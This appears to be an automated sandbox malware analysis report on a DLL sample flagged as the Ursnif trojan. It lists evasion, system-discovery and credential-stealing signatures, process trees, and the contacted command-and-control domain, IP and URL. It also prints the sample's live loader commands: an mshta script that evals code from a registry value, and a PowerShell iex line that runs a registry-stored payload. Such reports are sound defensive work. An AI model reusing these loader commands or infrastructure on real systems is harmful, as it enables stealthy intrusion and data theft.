Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1BD3EC push dword ptr fs:[00000030h] 3_2_6E1BD3EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1BD7E5 mov eax, dword ptr fs:[00000030h] 3_2_6E1BD7E5
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E17462D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_6E17462D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E17875F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6E17875F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E174901 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6E174901
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E17462D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6E17462D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E17875F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E17875F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E174901 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E174901

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: rundll32.exe, 00000002.00000000.404396366.0000000002ED0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.610195146.0000000002CD0000.00000002.00000001.sdmp, powershell.exe, 0000002A.00000002.609722055.00000273C7180000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000002.00000000.404396366.0000000002ED0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.610195146.0000000002CD0000.00000002.00000001.sdmp, powershell.exe, 0000002A.00000002.609722055.00000273C7180000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000000.404396366.0000000002ED0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.610195146.0000000002CD0000.00000002.00000001.sdmp, powershell.exe, 0000002A.00000002.609722055.00000273C7180000.00000002.00000001.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000002.00000000.404396366.0000000002ED0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.610195146.0000000002CD0000.00000002.00000001.sdmp, powershell.exe, 0000002A.00000002.609722055.00000273C7180000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E174ADB cpuid 2_2_6E174ADB
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 2_2_6E18C3CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 2_2_6E18C643
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 2_2_6E18C68E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 2_2_6E18C729
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 2_2_6E18C7B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 2_2_6E18CC36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 2_2_6E1834FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_6E18CD03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 2_2_6E18C59A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 2_2_6E18CA06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_6E18CB2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 2_2_6E183961
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 3_2_6E141E8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 3_2_6E18C3CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E18C643
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E18C68E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E18C729
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E1834FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_6E18CD03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_6E18CB2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 3_2_6E183961
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E174828 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 2_2_6E174828
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E183009 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 2_2_6E183009
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E141F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 3_2_6E141F10
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 447090 Sample: lj3H69Z3Io.dll Startdate: 12/07/2021 Architecture: WINDOWS Score: 96 42 Multi AV Scanner detection for domain / URL 2->42 44 Found malware configuration 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 4 other signatures 2->48 7 iexplore.exe 2 65 2->7         started        9 loaddll32.exe 1 2->9         started        11 mshta.exe 19 2->11         started        process3 signatures4 14 iexplore.exe 31 7->14         started        17 iexplore.exe 30 7->17         started        19 iexplore.exe 30 7->19         started        21 rundll32.exe 9->21         started        24 cmd.exe 1 9->24         started        26 rundll32.exe 9->26         started        30 2 other processes 9->30 52 Suspicious powershell command line found 11->52 28 powershell.exe 11->28         started        process5 dnsIp6 40 gtr.antoinfer.com 167.172.38.18, 49746, 49747, 49748 DIGITALOCEAN-ASNUS United States 14->40 50 Writes registry values via WMI 21->50 32 WerFault.exe 23 9 21->32         started        34 WerFault.exe 21->34         started        36 rundll32.exe 24->36         started        38 conhost.exe 28->38         started        signatures7 process8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
167.172.38.18
 gtr.antoinfer.com United States
14061 DIGITALOCEAN-ASNUS true

Contacted Domains

Name IP Active
gtr.antoinfer.com 167.172.38.18 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://gtr.antoinfer.com/favicon.ico true
  • Avira URL Cloud: safe
 unknown
http://gtr.antoinfer.com/M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2FaVCd/bp1e8aV2PI_2/FY5oP4oo0f6/GeARX2_2FlA_2F/2BhurwBe_2BrsQ1B1bUK7/wilinEmmYIdaZ6lz/71Mw33QzoCtr9s9/ULFilVIFcIxUDJIsEo/crrSiFkaK/6sQSCYti3ETwug18IBlk/b94MQVqQ698rgMibrOo/RMBVkg8AFrK4uT2Dq6pO06/OdceZPFn8QQWz/SARUSfJd/dirYBJB3Uuu4IivFAYs9FmV/Pmcsy6YvBv/Lcgiqf1bUTKnYCeNL/dikDMv66Bty/6H true
  • Avira URL Cloud: safe
 unknown